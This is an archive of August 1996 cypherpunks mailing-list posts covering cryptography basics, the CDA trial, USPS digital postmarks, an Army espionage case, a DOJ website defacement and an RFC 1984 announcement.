>have not yet invested huge amounts in computer infrastructure. 
>	 Ayton said he was scheduled to meet Indian banking officials  
>next week to discuss Internet-related possibilities in the 
>field. 
>	 Kapi Attawar, a senior Hewlett-Packard official dealing with  
>emerging markets, said his company saw particular potential for 
>the ``Intranet''. The latter enables local networks within 
>companies to be linked to the worldwide information highway. 
>	 Many Indian companies already had local computing networks  
>using basic data transmission facilities which may be used to 
>hook on to Internet, Attawar said. 
>  	   	
>
>
_______________________
Regards,            Nothing great was ever achieved without enthusiasm. 
		    -Ralph Waldo Emerson
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 23 Aug 1996 03:06:02 +0800
To: cypherpunks@toad.com
Subject: Court rules faxes are not binding
Message-ID: <2.2.32.19960822150702.0072b21c@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


  	  				 
>	CINCINNATI, Aug. 21 (UPI) -- A federal appellate court in Cincinnati  
>ruled this week that faxes are not necessarily legally binding if the 
>receiving party does not know the communication is coming. 
>	The case stemmed from a 1991-92 strike by 200 Clow Water System Co.  
>workers who were represented by the United Steelworkers. 
>	The court ruled the Coshocton company, a division of McWane Inc., did  
>not violate federal labor law when it hired replacement workers after 
>the union transmitted an unconditional fax offer to return to work in 
>February 1992. 
>	The union sent its offer by fax at 4:35 p.m. on a Friday, 25 minutes  
>before the plant closed for the day. The intended recipient claimed he 
>checked for any communications at 4:30, and when he saw there weren't 
>any, went home. 
>	On Saturday, Clow hired 80 replacement workers.  
>	The National Labor Relations Board later held that actual knowledge  
>of the fax was not required. The board said the parties had communicated 
>by facsimile during their negotiations, and that the facsimile was sent 
>and received. 
>	But the appellate court said the union had sent only four facsimile  
>transmissions during 13 months of negotiations. 
>	``All of these facsimiles contained contract proposals -- a  
>communication intended to be examined and considered, not a 
>communication having legal import in and of itself,'' the court said, 
>ordering the NLRB ruling against Clow must be re-evaluated. 
>	The court said facsimile and electronic mail are becoming  
>increasingly common forms of business communication, however, both 
>parties must agree to the use of such media and must be notified when 
>messages are sent. 
>	``The critical part of this case is that (the fax) was sent only 25  
>minutes before the plant closed,'' David Peck, a lawyer with Taft, 
>Stettinius & Hollister, the law firm that represented Clow, told United 
>Press International Wednesday. ``Normal courtesy is to call first and 
>again after to confirm that a fax has been received.'' 
>	The union claimed Clow committed an unfair labor practice by  
>permanently replacing economic strikers after the union made an 
>unconditional offer, as required by federal law, to return to work. 
>	But the court said the fax transmission itself wasn't the issue.  
>	``The key to this case is simply fair notice,'' the court said in its  
>decision. ``If the parties did not agree to the method of communication 
>utilized, and if there is no pattern of conduct reflecting acquiescence 
>to the method of communication utilized, we will not impute notice of 
>the communication to the recipient. 
>	``Communication by facsimile has simplified and streamlined the way  
>in which business in conducted in this country,'' the court added. 
>``This technological advance provides a valuable service and benefit, 
>and our holding should not be taken as an indication that parties should 
>not use facsimiles to conduct their affairs.'' 
>--	 
>		   C O P Y R I G H T * R E M I N D E R 	
>
>   This article is Copyright 1996 by United Press International.  
>   All articles in the clari.* news hierarchy are Copyrighted and licenced  
>to ClariNet Communications Corp. for distribution.  Except for articles 
>in the biz.clarinet.sample newsgroup, only paid subscribers may access 
>these articles. Any unauthorized access, reproduction or transmission 
>is strictly prohibited. 
>   We offer a reward to the person who first provides us with  
>information that helps stop those who distribute or receive our news 
>feeds without authorization. Please send reports to reward@clari.net. 
>[Use info@clari.net for sales or other inquiries.] 
>
>   Details on use of ClariNet material and other info can be found in  
>the user documentation section of our web page: <http://www.clari.net>. 
>You can also read ClariNet news from your Web browser. 
>  	   	
>
>
_______________________
Regards,            Nothing great was ever achieved without enthusiasm. 
		    -Ralph Waldo Emerson
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 23 Aug 1996 05:39:58 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Any CPs in D.C.?
In-Reply-To: <s792sD80w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960822110918.9687I-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I may stop by. Though I'll probably avoid any airborne spittle.

-Declan


On Thu, 22 Aug 1996, Dr.Dimitri Vulis KOTM wrote:

> Black Unicorn <unicorn@schloss.li> writes:
> > Are you in D.C. now?
> >
> > Perhaps a drink would be in order?
> 
> I'll be at InfoWarCon in Arlington Sept 4-6.
> 
> Any Usenet Cabal affiliates want to be spat on in person? :-)
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 23 Aug 1996 05:37:29 +0800
To: cypherpunks@toad.com>
Subject: Re: RC4 RC2 & MD5???
Message-ID: <199608221816.LAA01552@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 PM 8/21/96 -0700, Jeff Davis wrote:
>I assume then that the Netscape encryption is Symetric Key, so how do
>RC4 RC2 and MD5 compare and contast? TIA   

RC2 and RC4 are both both variable key length cyphers developed by Ron
Rivest for RSA Data Security Inc.  They were both protected by trade
secret, but both have been reverse engineered and posted to the net.  Both
of them have fast-path export approval if their key length is 40 bits or
less.

MD5 (Message Digest 5) is not a cypher but a secure hash.  If takes an
input of variable length and computes a 128 bit hash.  Recently some
weaknesses have been found in MD5 leading to the recomendation that new
applications be coded to use SHA1 instead.

As a note: Any good secure hash can be used as a symetric key cypher. 
Usually doing so involves considerably more computation than a symetric
cypher of equal strength.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Thu, 22 Aug 1996 12:22:03 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: www.usdoj.gov mirror2
In-Reply-To: <2.2.32.19960821230541.00637930@vertexgroup.com>
Message-ID: <199608220132.LAA24230@zztop.myinternet.net>
MIME-Version: 1.0
Content-Type: text


You, John F. Fricker, said about something or other:
+
+http://www.netlite.com/ameritek/usdoj is faster than that other site


is your in singapore/australia/new zealand, the fastest would be

http://www.skeeve.net/doj/


--------------------------------------------------------------------
Skeeve Stevens                              Email: skeeve@skeeve.net
CEO/The Big Boss/All round nice guy      URL: http://www.skeeve.net/
MyInternet                               Australian Anglicans Online
http://www.myinternet.net/               http://www.anglican.asn.au/
Phone: (+612) 869-3334        Mobile: (0414) SKEEVE [+61414-753-383]
Key fingerprint  =  D2 7E 91 53 19 FE D0 5C  DE 34 EA AF 7A 5C 4D 3E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 23 Aug 1996 04:12:00 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Any CPs in D.C.?
In-Reply-To: <s792sD80w165w@bwalk.dm.com>
Message-ID: <199608221608.MAA01581@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> Black Unicorn <unicorn@schloss.li> writes:
> > Are you in D.C. now?
> >
> > Perhaps a drink would be in order?

There is the dccp@eff.org list. You guys missed our Cryto
Museum talk [w/ employee sponsor!!] by Carl Ellison.

At least two dccp'ers will be at the Linux InstallFest
Sat [http://linux.wauug.org/fest.html]....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Fri, 23 Aug 1996 04:57:18 +0800
To: cypherpunks@toad.com
Subject: Re: USPS
In-Reply-To: <9608212250.AA14289@cow.net>
Message-ID: <Pine.BSI.3.91.960822120220.8472A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Bovine Remailer wrote:

> The Postal service is working on a new postage method, 2 key signature, which will be unique to each "postal unit" ( stamp ) the signature will be
> logged when you buy the stamps....No more anon. snail mail......
> 
> Just thought you'd like to know !

   In related news...

Web Week, July 8, 1996, p3
-

    In an effort to do its part to nuture electronic commerce, the U.S. 
Postal Service is launching a pilot project this summer to test the 
electronic postmarking of documents sent over the Web.

    The electronic postmark--a time and dte stamp--will carry the full 
legal weight of the postmark on standard mail, including the Postal 
Service's authority to investigate tampering.

[....]

    The Postal Service's attorneys have told the USPS that the tampering 
part of the current federal law would transfer to the electronic space, 
and that the mail fraud portion might also apply...

    "We're a trusted third party," Saunders said.  "We don't have any 
interest in learning your trade secrets.  Congress oversees our actions.  
Our customers have found that of value."

    Electronic postmarking is one of two services that the USPS intends 
to launch into cyberspace.  The second is a certificate-authority 
service, in which people can take a public encryption key and register it 
with the Postal Service for general use on the Internet.

    There will be three levels of security offered: simple online 
registration; a physical verification of identity; and the highest level, 
which requires electronic THUMBPRINTS.  The certification program will 
pilot-test in the fall and will be available to the public by the end of 
the year.  The price will be $10 to $15, Raines said.  The certificates 
will last one to three years, specified at registration.

    Cylink Corp,...is providing the public-key encryption and certificate-
issuing technology fo the Postal Service, basd on the company's patented 
Diffie-Hellman public-key cryptography scheme.  Neither the Postal 
Service nor Cylink executives would discuss the use of those technologies.

[Information about how their software will be integrated into software by 
Microsoft, Lotus and Netscape]

[....]

    The Postal Service plans to add follow-up services, including an 
electronic return-receipt program and time-specific delivery.

[Talk about how great it would be to mail in your tax return with delayed 
delivery]

[They say that Verisign is the alleged only real competitor in the 
certificate market]

--
                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Thu, 22 Aug 1996 22:06:09 +0800
To: cypherpunks@toad.com
Subject: Re: cryptoanalysis 002
Message-ID: <9608221149.AA13676@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> From: Scottauge@aol.com
> Date: Tue, 20 Aug 1996 18:36:45 -0400
> Subject: cryptoanalysis 002

> For example, if the crypto-alphabet for e is 23, 45, 190, 200, etc, one can
> remove some of the frequency for a letter.  This definately makes it harder
> to attack with the frequency analysis method because the "resolution" of the
> distribution for the letter is lessened to a near randomness.  (So it looks,
> there are still clues, eh?)

I think (from memory) this is called "homoalphabetic".

Encyclopaedia Brittanica (Cryptology - article by Gus Simmons)
says that it is still vulnerable to frequencies of digraphs, trigraphs
etc.  But even Gauss was keen on it once.

I guess it might have value as a part of another system, making a known plaintext
into one of many.  Whether it's worth the increased cyphertext size in a system
you'd hope to be immune to known plaintext attacks anyway is another question.

PA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Fri, 23 Aug 1996 07:41:04 +0800
To: cypherpunks@toad.com
Subject: Re: Republican and Democratic party platforms [NOT!] on technology
In-Reply-To: <v01510103ae4232dcce6d@[204.62.128.229]>
Message-ID: <Pine.GUL.3.95.960822120928.25102B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 22 Aug 1996, Declan McCullagh wrote:

> But the benefit of having a pro-privacy statement in the platform (which in
> fact was watered down significantly from that originally proposed by
> advocates on our side) is that the platform covers Republican Party
> candidates for any office, not just the presidency.

One Republican staffer sent you an ass-kissing note quoting an ALLEGED piece
of the platform WHICH IS NOT ACTUALLY THERE. The platform was finalized on
August 12th. The text you quoted is not even in the list of rejected
amendments. I assume that either you or the staffer you talked to innocently
mistook some Senator's position paper for the platform; it's hard to believe
that anyone would intentionally lie about something that is so trivial to
check.

Even if the text you passed on were part of the platform, I fail to see the
importance of a feel-good statement in a platform that the party's
presidential candidate CLAIMS NOT TO HAVE EVEN READ.

Also from the Republican Platform (perhaps out of context, but unlike the
text some anonymous alleged Republican staffer sent you, this is actually
in the platform): 

[...]

In a Dole Administration, U. S. Attorneys will prosecute and jail those who
prey upon the innocent. We support upgrading our interdiction effort by
establishing a Deputy Commissioner for Drug Enforcement within the Customs
Service. We will intensify our intelligence efforts against international
drug traffickers and use whatever means necessary to destroy their
operations and seize their personal accounts.

We support strong penalties, including mandatory minimum sentences, for drug
trafficking, distribution and drug-related crimes.  Drug use is closely
related to crime and recidivism. Drug testing should be made a routine
feature of the criminal justice process at every stage, including the
juvenile justice system. Test results should be used in deciding pretrial
release, sentencing, and probation revocation.

[...]

Terrorist states have made a comeback during Bill Clinton's Administration. 
He has treated their rulers with undue respect and failed to curb their
acquisition of weapons of mass destruction.  Although congressional
Republicans passed anti-terrorism legislation earlier this year, the Clinton
Administration has not implemented many key provisions of the law. It has
not been used to freeze terrorists' assets, deny terrorists' visas, cut off
foreign aid to supporters of terrorist states, or halt terrorist fundraising
in the United States. The Clinton Administration has not implemented the
anti-terrorist research program established and funded by Congress in the
1990 Aviation Security Act.

[...]

Our technological edge is at risk not only because of the Clinton
Administration's refusal to sustain an adequate investment in defense
modernization, but also its virtual abandonment of national security-related
export controls.  Acquisition of technology by aspiring proliferators of
weapons of mass destruction has been irresponsibly facilitated. A Republican
Administration will protect the American technological edge. It will do so
by expanding investment in defense modernization, ensuring that the Defense
Department has a key role in approving exports of militarily critical
technology, and restoring the effectiveness of export control regimes.

[...]

The intelligence community should be our first line of defense against
terrorism, drug trafficking, nuclear proliferation, and foreign espionage.
Bill Clinton's neglect of our country's intelligence service is one of his
most serious sins of omission. He has underfunded, misutilized, and
marginalized critical intelligence missions and capabilities. No wonder his
first appointee as Director of Central Intelligence has endorsed Bob Dole.
The nation's security - and the personal safety of our citizens - cannot be
placed at risk.

Effective intelligence can be expensive. But what it costs is measured in
dollars rather than lives - an important lesson of the Gulf War. A
Republican Administration will reverse the decline in funding for
intelligence personnel and operations while better managing the development
of futuristic capabilities. We will not constrain U.S. intelligence
personnel with "politically correct"  standards that impede their ability to
collect and act on intelligence information. We will conduct whatever
intelligence operations are necessary to safeguard American lives against
the terrorists who bomb our airplanes and buildings.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMhy5wpNcNyVVy0jxAQFvgwH9FR9ZQca520mSuqhDO7OKLe6duAJAQ+HO
FP4UPnLWJZtOrI9LvWiX5EHoqG0RtaS2FwwMuwGZQedb8YdkW4QWUw==
=XdnD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Fri, 23 Aug 1996 05:45:50 +0800
To: cypherpunks@toad.com
Subject: DOJ Scam!
Message-ID: <199608221256.MAA00179@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



Vipul wrote :

> >I think its a DOJ's doing. They prolly want to show the courts how
> >bad hackers can get so they can conjure up some support in forthcomming
> >trials. C'mon the sysadmins aren't fools, they surely see their own site.

Dungeon Master wrote:

> this is a very highly possible conclusion... and I wouldn't go against it.
> I the traditional since.. r00ts know there shit... and if the operator(s) of
> DOJ didn't know how firewall down the country's own Justice web page.. then
> we have some serious measures to be taken on lack of education in there
> part.. and furthermore they would have portrayed it as lack of security
> there and point the theoretical finger at the site admin..  but no, it
> didn't happen.  folks, I think its a scam... not only for these reasons...
> but just look at the material that was altered... I am sorry.. but speaking
> from some exp. here... if I had access to some place like that.. I wouldn't
> have bothered de-facing what the public sees... I would rather have gone to
> a more effective means of sabotage..  to the root of the system.. to data
> storage and records..  the real hackers out there are the ones who don't
> make themselves known.

And particular thing to note is that *indecency*.


- Vipul
vipul@pobox.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 23 Aug 1996 05:26:03 +0800
To: cypherpunks@toad.com
Subject: "Freedom on Trial," from October 1996 Playboy
Message-ID: <v01510108ae42522427bb@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


[Some excerpts follow. Pick up the October issue for the full article. --Declan]



Playboy, October 1996
"Freedom on Trial: how the communications decency act played in court"

By Declan McCullagh (declan@well.com)


Day 1 (March 21)

In the shadow of the Liberty Bell in downtown Philadelphia, the future of
online liberty is being decided. A panel of federal judges has gathered
to hear a challenge to the Communications Decency Act, which bans
"indecent" or "patently offensive" material from being transmitted or
displayed online where minors might access it. That means just about
anywhere online.

[...]



Day 2 (March 22)

A key witness today is Robert Croneberger of the Carnegie Library of
Pittsburgh. The judges are pleased with his description of the
Internet as a library -- finally, someone who isn't using technobabble.
Croneberger testifies about the difficulties and expense of implementing
the CDA, noting that his library would have to hire 180 people to review
and censor the 2 million listings in its catalog. Russotto, the
government lawyer, is skeptical. During her cross-exam, she tries to make
the case that the job wouldn't be so difficult as Croneberger portrays it.

Q: Can you do a keyword search through your catalog for words related to
sex or for the seven dirty words [to find material to restrict]?
A: It depends.
Q: But a keyword search on sex wouldn't turn up books about physics,
would it?
A: I doubt it.
Q: And a search on sex isn't going to turn up books about gardening?
A: Obviously plants proliferate and flowers grow, but it depends on the
words you're using.
Q: Would a search on sex turn up a biography of Abraham Lincoln?
A: I've read many articles about his supposed sex life, or lack thereof.
Q: Would a search on sex turn up any books about geology?
A: Only if "rock" is put together with "roll."

Croneberger's point is subtle but clear. Sex can't be taken out of a
library any more easily than it can be separated from life.

[...]



Day 4 (April 12)

The government witnesses take the stand. First up is Howard Schmidt,
an Air Force special agent who says he has conducted 30 to 50
investigations of online porn. The judges are growing weary of
demonstrations and sex, so when Schmidt offers to download provocative
images from Usenet groups, the panel asks for G-rated animals instead.
After the second or third waterfowl image, Judge Sloviter rules, "I think
we've seen enough ducks."

[...]

Beyond its sheer stupidity, [Carnegie Mellon University computer scientist
Dan Olsen's -L18 self-labelling scheme] seems to be built with prudery
rather than technology. During cross-examination, the judges didn't appear
to take him seriously:

Q: If you thought about posting a centerfold from Playboy, would you
think the image might be indecent or patently offensive for persons under
18?
A; If we consider the local community that consists of Dan, Dan would be
offended.
Q: And how about the seven dirty words.
A: Dan would be offended.
Judge Buckwalter: Who's Dan?
Judge Sloviter: Yes, who's Dan?
A: That's me. I'm sorry.
Judge Dalzell: Oh, he's the community. He is an expert on what would
offend him.
A: It's a relatively small community, but it's the one I know best.
Buckwalter: I thought Dan was an acronym.

A moment later, our lawyers show Olsen a list of Internet addresses and
ask if they appear to be porn sites deserving of unsuitable-for-children
tags. He hesitates, then says, "I don't know, but I wouldn't go there."

Looking over the list, Judge Dalzell adds the punch line. "Chick of the
Day could be poultry," he suggests.

"You really are in for ducks and poultry," says Judge Sloviter.

"It's a leitmotif."

Bruce Ennis, counsel for the ALA, asks Olsen how content providers would
verify the ages of those who visit their sites. Olsen stammers a bit and
then hits on an idea. Ask the Social Security Administration! It keeps
records of such things.

Big Brother couldn't have said it better.



Day 5 (April 15)

The government has a tough road ahead. It has to convince three skeptical
judges that enforcing the CDA would not become a boondoggle. Olsen, at least,
believes it can be done. When asked if his rating system would slow the
growth of the Net, he quickly responds, "Absolutely not!"

But everyone in the courtroom seems to feel Olsen is being a weasel.
Judge Dalzell, the most Net-savvy judge and the only one with young kids
(I'm guessing the two are related), helps pin the inventor down. "Assume
a chat group -- say, students from 13 to 18 -- is talking about the CDA.
In the course of the chat, an 18-year-old is exasperated and types in
'Fuck the CDA.' Is it your proposal that before he types the message, he
should tag it -L18?"

Dalzell is paraphrasing Cohen v. California, a First Amendment case in
which the Supreme Court overturned the conviction of a teenager who wore
a jacket that read "Fuck The Draft."

Some of Dalzell's other questions were equally astute. "If in one issue of
The Economist the word 'fuck' appears," he asks Olsen, "the library
putting it online would have to go through the entire issue?"

"Somebody would have to make that judgement," Olsen replies. He suggests
that librarians band together to censor material. He insists his plan is
"flexible." To that, Bruce Ennis reponds testily, "Is it flexible if you,
the librarian, risk going to jail for two years if you make the wrong
judgment and put material online that is found to be patently offensive
for a minor?"

[...]

Sloviter isn't finished. After Olsen claims that a voluntary rating
system developed at MIT is unfeasible because it will "slow the flow"
online, she asks how an adult could show -L18 tagged materials to a
mature teenager. Olsen replies that a "teacher or parent could log on."

"Wouldn't that slow the flow?" the judge asks.

Flustered, Olsen suddenly discharges a series of staccato high-pitched
giggles. It's the damnedest thing that I have ever heard -- it sounds
like a rabbit being tortured to death. The galley stares in horror.

Thus ends the testimony of our best witness -- and we didn't even call
him to the stand.



Day 6 (May 10)

During closing arguments, Justice attorney Tony Coppolino dances around
providing a legal definition for indecency. He hints that it would
include only hard-core porn but concedes the government can't guarantee
that an ambitious prosecutor somewhere wouldn't take on an absurd case.

Judge Sloviter is growing impatient: "I've been taking the position for
17 years that people should know what they can be prosecuted for," she
says "I still don't understand" what indecency means under the CDA.

"We've been trying to get at this for 40 minutes," grumbles Judge
Dalzell.

[...]



EPILOGUE

We have won -- for now. The government's appeal will reach the Supreme
Court during the next few months. If the Court upholds the lower court
decision, outraged right-wing groups will demand action. Congress will
spring to attention. Bills will be drawn up, campaign funds raised, and
porn once again waved in the Senate chamber.

Censorship is often championed by adults who want to protect children
from a world the adults do not understand. During the hearing, Judge
Buckwalter raised this issue while discussing the computer gap between
parents and children that helps fuel fears of online dangers. "In another
generation that will fade from the picture, don't you think?" he asked.
Archaic restrictions over what we can share online, however, may not.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 23 Aug 1996 05:21:40 +0800
To: cypherpunks@toad.com
Subject: U.S. Army Private Faces Spying Charges
Message-ID: <9608221711.AA00368@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain



source: http://www.yahoo.com/headlines/960821/news/stories/spy_1.html

U.S. Army Private Faces Spying Charges

WASHINGTON (Reuter) - The U.S. Army said Wednesday it had charged a
20-year-old computer specialist with espionage and computer crimes in a
case that the soldier's parents said involved a Chinese national.

Pfc. Eric Jenott of the 50th Signal Battalion at Fort Bragg, North
Carolina, was formally charged June 28 and is in a Marine Corps jail in
Camp Lejeune, North Carolina, awaiting court-martial, the army said.

``The case involves classified information and matters pertaining to
national security,'' a three-paragraph statement from Fort Bragg, home
of the Army's 18th Airborne Corps, said. It said many of the case's
details were too sensitive to disclose.

Jenott has been charged with giving ``secret computer passwords relating
to the national defense'' to a Mr. Lee, ``a citizen of a foreign
nation,'' his lawyer said, reading from the charge sheet. He also faces
charges of destruction of government property and larceny.

The charge sheet alleged Jenott disclosed the passwords between April
and June ``with the intent or reason to believe it would be used to the
injury of the United States or to the advantage of a foreign nation.''

It said the passwords ``directly concerned communications
intelligence,'' among the most closely guarded U.S. secrets.

Jenott is facing a general court-martial, the most serious kind, and
a possible life sentence if convicted, his lawyer, Timothy Dunn, of
Fayetteville, North Carolina, said in a telephone interview.

He said his client was ``not a criminal'' but had broken into a
supposedly impenetrable system after advising his superiors of defects
in the security system. Dunn declined to discuss the system because
of what he called the case's sensitive nature and national security
implications.

John Jenott said his son, a fluent Chinese speaker whom he described as
a ``computer genius'' with a longstanding interest in China, had given a
young Chinese friend what the son described as an unclassified computer
code.

He said his son knew the person to whom he gave the code from one
of several trips he had made to China. His son, ``not your average
kid-out-on-a-skateboard-type guy,'' could read and write Chinese and
lived with a Chinese family in Vancouver, Canada, for about a year when
he was in high school, the father added.

He said his son told him that before giving away the code, he had
been trying to show his superiors a security flaw in a sensitive
communication system and eventually demonstrated he could get secret
data without authorization.

``He was trying to say we have a weakness,'' John Jenott said in a
telephone interview from his home in Graham, Washington. ``This stuff
about being a spy -- it's ridiculous.'' His stepmother, Kelly Jenott,
said, ``They're blowing this way out of proportion.''

His father said an Army major at Fort Bragg, whom he declined to name,
had urged him to persuade his son to sign a confession, so prosecutors
would not seek the death penalty.

Jenott said his son had told him, ``Dad, I'd rather die than sign
that.''

``He said it's not true. He said, 'I'm not a spy. I didn't commit
espionage. And I'm not going to sign something that says I did,'''
Jenott said.

 -30-

rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 23 Aug 1996 05:44:33 +0800
To: cypherpunks@toad.com
Subject: Re: Any CPs in D.C.?
In-Reply-To: <199608221608.MAA01581@nrk.com>
Message-ID: <0XP3sD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher <wb8foz@nrk.com> writes:

> > Black Unicorn <unicorn@schloss.li> writes:
> > > Are you in D.C. now?
> > >
> > > Perhaps a drink would be in order?
> 
> There is the dccp@eff.org list. You guys missed our Cryto
> Museum talk [w/ employee sponsor!!] by Carl Ellison.

We (myself & Dr.M.V.) were there alright and even spoke briefly to David.
We greatly enjoyed the tour and the lecture given by the museum staff member.
Afterwards we felts like talking crypto, so we skipped Hinkel's and went over
to Annapolis, where we talked crypto with knowledgeable folks. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Fri, 23 Aug 1996 01:25:06 +0800
To: cypherpunks@toad.com
Subject: SpamBot
Message-ID: <321c65db.721494@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain



  Well, with all the other noise in the list lately, I'll add a little of
my own. I woke up today to find my mailbox filled with 20 messages from a
'careernetonline.com' offering to spread my resume across the net for $60.

  It was one of those terrorist spams where they apologize for wasting your
time and tell you that you can stop getting spammed by replying to the
message. Well, I really hate giving in to terrorists, no matter what form
they take. And I'm sick and tired of spam.

  So, I'm starting a project called SpamBot. You feed it a message and a
list of addresses and the bot send the message to those addresses until
they reply with an appropriate message indicating that they are at least
looking into the problem.

  Some people may say that this is sinking to their level. So it is, but I
think its time that system administrators realized that there are people
who don't appreciate being the target for shotgun marketing schemes (none
of which have been of any use to me).

  Watch my webpage for more info on this helpful little bot.

    Brian

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
       "Extremism in the defense of Liberty is no vice" - B. Goldwater
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Fri, 23 Aug 1996 05:47:13 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: RFC1984 on Cryptographic Technology (fwd)
Message-ID: <199608221804.OAA20272@charon.gti.net>
MIME-Version: 1.0
Content-Type: text/plain


An entity claiming to be RFC Editor wrote:
>From majordom@ISI.EDU Thu Aug 22 13:27 EDT 1996
Message-Id: <199608201538.AA03394@zephyr.isi.edu>
To: rfc-dist@ISI.EDU
Subject: RFC1984 on Cryptographic Technology
Cc: rfc-ed@ISI.EDU
Mime-Version: 1.0
Date: Tue, 20 Aug 96 08:40:50 PDT
From: RFC Editor <rfc-ed@ISI.EDU>
Sender: owner-rfc-dist@ISI.EDU
Content-Type: Multipart/Mixed; Boundary=NextPart
Content-Length: 3011


--NextPart


A new Request for Comments is now available in online RFC libraries.


        RFC 1984:

        Title:      IAB and IESG Statement on Cryptographic Technology
                    and the Internet
        Author:     IAB & IESG
        Date:       August 1996
        Mailbox:    brian@dxcoms.cern.ch, fred@cisco.com
        Pages:      5
        Characters: 10,738
        Updates/Obsoletes:  none

        URL:        ftp://ds.internic.net/rfc/rfc1984.txt


The Internet Architecture Board (IAB) and the Internet Engineering
Steering Group (IESG), the bodies which oversee architecture and
standards for the Internet, are concerned by the need for increased
protection of international commercial transactions on the Internet,
and by the need to offer all Internet users an adequate degree of
privacy.  Security mechanisms being developed in the Internet
Engineering Task Force to meet these needs require and depend on the
international use of adequate cryptographic technology.  Ready access
to such technology is therefore a key factor in the future growth of
the Internet as a motor for international commerce and communication.

This memo provides information for the Internet community.  This memo
does not specify an Internet standard of any kind.  Distribution of
this memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to IETF-REQUEST@CNRI.RESTON.VA.US.  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to RFC-DIST-REQUEST@ISI.EDU.

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to rfc-info@ISI.EDU with the message body 
help: ways_to_get_rfcs.  For example:

        To: rfc-info@ISI.EDU
        Subject: getting rfcs

        help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to admin@DS.INTERNIC.NET.  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.

Submissions for Requests for Comments should be sent to
